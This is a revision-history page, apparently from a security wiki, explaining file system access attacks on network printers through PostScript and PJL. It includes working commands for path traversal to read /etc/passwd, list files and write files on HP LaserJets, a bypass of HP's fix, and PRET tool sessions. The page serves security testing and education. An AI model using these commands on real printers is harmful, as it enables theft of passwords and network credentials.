File system access - Revision history

Admin at 09:53, 20 July 2017

2017-07-20T09:53:44Z

Admin at 17:44, 2 July 2017

2017-07-02T17:44:34Z

Admin at 17:52, 24 January 2017

2017-01-24T17:52:59Z

Admin: Created page with "If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files thro..."

2017-01-24T17:48:07Z

Created page with "If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files thro..."

New page

If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices.

== PostScript ==

The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below:

<syntaxhighlight lang=postscript>
> /str 256 string def (%*%../*) % list all files
> {==} str filenameforall
< (%disk0%../webServer/home/device.html)
< (%disk0%../webServer/.java.login.config)
< (%disk0%../webServer/config/soe.xml)

> byte (0) def % read from file
> infile (../../../etc/passwd) (r) file def
> { infile read {byte exch 0 exch put
> (%stdout) (w) file byte writestring}
> {infile closefile exit} ifelse
> } loop
< root::0:0::/:/bin/dlsh

> /outfile (test.txt) (w+) file def}} % write to file
> outfile (Hello World!) writestring
> outfile closefile
</syntaxhighlight>

Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions:

* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed as shown in <ref name="mueller2016printers"/>: By using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code> while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>.

* Various '''OKI laser printers''' allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point.

'''How to test for this attack?'''

File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ../..
d - Jan 1 1970 (created Jan 1 1970) bootdev
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss
d - Jan 1 1970 (created Jan 1 1970) dsk_ram0
d - Jan 1 1970 (created Jan 1 1970) etc
d - Jan 1 1970 (created Jan 1 1970) tmp
d - Jan 1 1970 (created Jan 1 1970) webServer

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system access with PJL on a ''HP LaserJet 4200N'' is given below:

> @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files)
< .\:\:TYPE=DIR
< ..\:\:TYPE=DIR
< PostScript TYPE=DIR
< PJL TYPE=DIR
< saveDevice TYPE=DIR
< webServer TYPE=DIR

> @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file)
< @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
> @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
< root::0:0::/:/bin/dlsh

> @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file)
> Hello World!

Accessing files with PJL is not supported by many printers. Examples are given below:

* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks].

* For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames.

'''How to test for this attack?'''

File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls
d - PJL
d - PostScript
d - saveDevice
d - webServer

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

@@ Line 74: / Line 74: @@
 Accessing files with PJL is not supported by many printers. Examples are given below:
-* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [[Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks]].
+* Various '''HP LaserJet''' printers are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken either by resetting the device to [[factory defaults]] or by performing [[Credential disclosure#Brute-Force_Attacks|brute-force attacks]].
 * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames.

@@ Line 12: / Line 12: @@
 < (%disk0%../webServer/config/soe.xml)
-> byte (0) def                                                % read from file
+> /byte (0) def                                                % read from file
-> infile (../../../etc/passwd) (r) file def
+> /infile (../../../etc/passwd) (r) file def
 > { infile read {byte exch 0 exch put
 >   (%stdout) (w) file byte writestring}

@@ Line 35: / Line 35: @@
 File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:
-  ./pret.py -q printer pjl
+  ./pret.py -q printer ps
   Connection to printer established
@@ Line 74: / Line 74: @@
 Accessing files with PJL is not supported by many printers. Examples are given below:
-* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks].
+* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [[Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks]].
 * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames.
@@ Line 86: / Line 86: @@
   Welcome to the pret shell. Type help or ? to list commands.
-  printer:/> ls
+  printer:/> ls ..
-  d        -   PJL
+  d        -   bootdev
-  d        -   PostScript
+  d        -   dsk_jdi
-  d        -   saveDevice
+  d        -   dsk_jdi_ss
   d        -   webServer
 '''Who can perform this attack?'''